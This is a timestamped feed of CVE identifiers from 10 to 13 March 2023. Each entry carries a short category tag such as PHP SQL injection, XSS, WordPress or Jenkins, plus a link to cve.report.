2023-03-13 18:00:06.123787 (PHP, SQL injection, Critical) CVE-2023-1365 https://cve.report/CVE-2023-1365
2023-03-13 18:00:06.124162 (PHP, SQL injection, Critical) CVE-2023-1364 https://cve.report/CVE-2023-1364
2023-03-13 19:00:03.812133 (PHP, SQL injection, Critical) CVE-2023-1368 https://cve.report/CVE-2023-1368
2023-03-13 19:00:03.812506 (PHP, SQL injection, Critical) CVE-2023-1366 https://cve.report/CVE-2023-1366
2023-03-13 22:00:04.108741 (Docker) CVE-2023-0629 https://cve.report/CVE-2023-0629
2023-03-13 22:00:04.109121 (Docker, Arbitrary Command) CVE-2023-0628 https://cve.report/CVE-2023-0628
2023-03-13 23:00:03.618408 (WordPress) CVE-2023-1374 https://cve.report/CVE-2023-1374
2023-03-13 23:00:03.618829 (WordPress) CVE-2023-1372 https://cve.report/CVE-2023-1372
datetime subject id link
2023-03-11 01:00:05.213381 (GitHub, XSS) CVE-2023-1315 https://cve.report/CVE-2023-1315
2023-03-11 01:00:05.213668 (XSS) CVE-2022-48111 https://cve.report/CVE-2022-48111
2023-03-11 02:00:04.116962 (File Upload) CVE-2023-27164 https://cve.report/CVE-2023-27164
2023-03-11 02:00:04.117348 (PHP, SQL injection, Critical) CVE-2023-1322 https://cve.report/CVE-2023-1322
2023-03-11 02:00:04.117639 (PHP, SQL injection, Critical) CVE-2023-1321 https://cve.report/CVE-2023-1321
2023-03-11 02:00:04.117972 (GitHub, XSS) CVE-2023-1320 https://cve.report/CVE-2023-1320
2023-03-11 02:00:04.118223 (GitHub, XSS) CVE-2023-1319 https://cve.report/CVE-2023-1319
2023-03-11 02:00:04.118457 (GitHub, XSS) CVE-2023-1318 https://cve.report/CVE-2023-1318
2023-03-11 02:00:04.118736 (GitHub, XSS) CVE-2023-1317 https://cve.report/CVE-2023-1317
2023-03-11 02:00:04.119016 (GitHub, XSS) CVE-2023-1316 https://cve.report/CVE-2023-1316
2023-03-11 06:00:04.201341 (WordPress) CVE-2023-1346 https://cve.report/CVE-2023-1346
2023-03-11 06:00:04.201828 (WordPress) CVE-2023-1345 https://cve.report/CVE-2023-1345
2023-03-11 06:00:04.202139 (WordPress) CVE-2023-1344 https://cve.report/CVE-2023-1344
2023-03-11 06:00:04.202463 (WordPress) CVE-2023-1343 https://cve.report/CVE-2023-1343
2023-03-11 06:00:04.213882 (WordPress) CVE-2023-1342 https://cve.report/CVE-2023-1342
2023-03-11 06:00:04.214260 (WordPress) CVE-2023-1341 https://cve.report/CVE-2023-1341
2023-03-11 06:00:04.214561 (WordPress) CVE-2023-1340 https://cve.report/CVE-2023-1340
2023-03-11 06:00:04.214903 (WordPress) CVE-2023-1339 https://cve.report/CVE-2023-1339
2023-03-11 06:00:04.215193 (WordPress) CVE-2023-1338 https://cve.report/CVE-2023-1338
2023-03-11 06:00:04.215469 (WordPress) CVE-2023-1337 https://cve.report/CVE-2023-1337
2023-03-11 06:00:04.215806 (WordPress) CVE-2023-1336 https://cve.report/CVE-2023-1336
2023-03-11 06:00:04.216097 (WordPress) CVE-2023-1335 https://cve.report/CVE-2023-1335
2023-03-11 06:00:04.216366 (WordPress) CVE-2023-1334 https://cve.report/CVE-2023-1334
2023-03-11 06:00:04.216636 (WordPress) CVE-2023-1333 https://cve.report/CVE-2023-1333
2023-03-11 07:00:05.203509 (Jenkins, XSS) CVE-2023-27905 https://cve.report/CVE-2023-27905
2023-03-11 07:00:05.203883 (Jenkins) CVE-2023-27904 https://cve.report/CVE-2023-27904
2023-03-11 07:00:05.204199 (Jenkins) CVE-2023-27903 https://cve.report/CVE-2023-27903
2023-03-11 07:00:05.204479 (Jenkins) CVE-2023-27902 https://cve.report/CVE-2023-27902
2023-03-11 07:00:05.204829 (Jenkins, Apache Commons FileUpload) CVE-2023-27901 https://cve.report/CVE-2023-27901
2023-03-11 07:00:05.205202 (Jenkins, Apache Commons FileUpload) CVE-2023-27900 https://cve.report/CVE-2023-27900
2023-03-11 07:00:05.205504 (Jenkins) CVE-2023-27899 https://cve.report/CVE-2023-27899
2023-03-11 07:00:05.205889 (Jenkins, XSS) CVE-2023-27898 https://cve.report/CVE-2023-27898
2023-03-11 07:00:05.206898 (Remote Code Execution) CVE-2023-25143 https://cve.report/CVE-2023-25143
2023-03-11 07:00:05.207465 (SQL injection) CVE-2023-1198 https://cve.report/CVE-2023-1198
2023-03-11 08:00:06.123215 (PHP, File Upload) CVE-2023-23328 https://cve.report/CVE-2023-23328
2023-03-11 08:00:06.123768 (XSS) CVE-2023-23326 https://cve.report/CVE-2023-23326
2023-03-11 19:00:04.505535 (Command Injection, Critical) CVE-2023-1350 https://cve.report/CVE-2023-1350
2023-03-11 19:00:04.505941 (PHP) CVE-2023-1349 https://cve.report/CVE-2023-1349
2023-03-11 22:00:04.323025 (PHP, SQL injection, Critical) CVE-2023-1351 https://cve.report/CVE-2023-1351
datetime subject id link
2023-03-10 01:00:03.115675 (PHP, SQL injection, Critical) CVE-2023-1294 https://cve.report/CVE-2023-1294
2023-03-10 01:00:03.116089 (MySQL, PHP, SQL injection, Critical) CVE-2023-1293 https://cve.report/CVE-2023-1293
2023-03-10 01:00:03.116470 (PHP, SQL injection, Critical) CVE-2023-1292 https://cve.report/CVE-2023-1292
2023-03-10 01:00:03.116760 (PHP, SQL injection, Critical) CVE-2023-1291 https://cve.report/CVE-2023-1291
2023-03-10 01:00:03.117123 (PHP, SQL injection, Critical) CVE-2023-1290 https://cve.report/CVE-2023-1290
2023-03-10 03:00:04.418983 (XXE) CVE-2023-1288 https://cve.report/CVE-2023-1288
2023-03-10 03:00:04.419198 (Remote Code Execution) CVE-2023-1287 https://cve.report/CVE-2023-1287
2023-03-10 07:00:06.313313 (Remote Attack) CVE-2023-20049 https://cve.report/CVE-2023-20049
2023-03-10 07:00:06.314251 (Kubernetes) CVE-2023-27484 https://cve.report/CVE-2023-27484
2023-03-10 07:00:06.314645 (Kubernetes) CVE-2023-27483 https://cve.report/CVE-2023-27483
2023-03-10 07:00:06.314962 (PHP, SQL injection) CVE-2023-27214 https://cve.report/CVE-2023-27214
2023-03-10 07:00:06.315320 (PHP, SQL injection) CVE-2023-27213 https://cve.report/CVE-2023-27213
2023-03-10 07:00:06.315536 (PHP, XSS) CVE-2023-27212 https://cve.report/CVE-2023-27212
2023-03-10 07:00:06.315780 (PHP, XSS) CVE-2023-27211 https://cve.report/CVE-2023-27211
2023-03-10 07:00:06.316071 (PHP, SQL injection) CVE-2023-27210 https://cve.report/CVE-2023-27210
2023-03-10 07:00:06.316441 (PHP, XSS) CVE-2023-27208 https://cve.report/CVE-2023-27208
2023-03-10 07:00:06.316635 (PHP, SQL injection) CVE-2023-27207 https://cve.report/CVE-2023-27207
2023-03-10 07:00:06.316963 (PHP, XSS) CVE-2023-27206 https://cve.report/CVE-2023-27206
2023-03-10 07:00:06.317316 (PHP, SQL injection) CVE-2023-27205 https://cve.report/CVE-2023-27205
2023-03-10 07:00:06.317523 (PHP, SQL injection) CVE-2023-27204 https://cve.report/CVE-2023-27204
2023-03-10 07:00:06.317780 (PHP, SQL injection) CVE-2023-27203 https://cve.report/CVE-2023-27203
2023-03-10 07:00:06.318058 (PHP, SQL injection) CVE-2023-27202 https://cve.report/CVE-2023-27202
2023-03-10 08:00:07.510890 (PHP, Critical) CVE-2023-1303 https://cve.report/CVE-2023-1303
2023-03-10 08:00:07.511289 (PHP) CVE-2023-1302 https://cve.report/CVE-2023-1302
2023-03-10 08:00:07.511584 (PHP, SQL injection, Critical) CVE-2023-1301 https://cve.report/CVE-2023-1301
2023-03-10 08:00:07.511907 (PHP, SQL injection, Critical) CVE-2023-1300 https://cve.report/CVE-2023-1300
2023-03-10 08:00:07.512556 (XSS) CVE-2023-0050 https://cve.report/CVE-2023-0050
2023-03-10 11:00:04.618899 (GitHub) CVE-2023-1307 https://cve.report/CVE-2023-1307
2023-03-10 18:00:04.720245 (PHP, SQL injection, Critical) CVE-2023-1311 https://cve.report/CVE-2023-1311
2023-03-10 18:00:04.720543 (PHP, SQL injection, Critical) CVE-2023-1310 https://cve.report/CVE-2023-1310
2023-03-10 18:00:04.720857 (PHP, SQL injection, Critical) CVE-2023-1309 https://cve.report/CVE-2023-1309
2023-03-10 18:00:04.721165 (PHP, SQL injection, Critical) CVE-2023-1308 https://cve.report/CVE-2023-1308
2023-03-10 18:00:04.721421 (SQL injection) CVE-2023-1091 https://cve.report/CVE-2023-1091
2023-03-10 20:00:08.209186 (GitHub, XSS) CVE-2023-1312 https://cve.report/CVE-2023-1312
2023-03-10 21:00:04.723760 (GitHub) CVE-2023-1313 https://cve.report/CVE-2023-1313
2023-03-10 21:00:04.724142 (Remote Attack) CVE-2023-22301 https://cve.report/CVE-2023-22301
2023-03-10 23:00:04.506170 (PHP, SQL injection) CVE-2023-24774 https://cve.report/CVE-2023-24774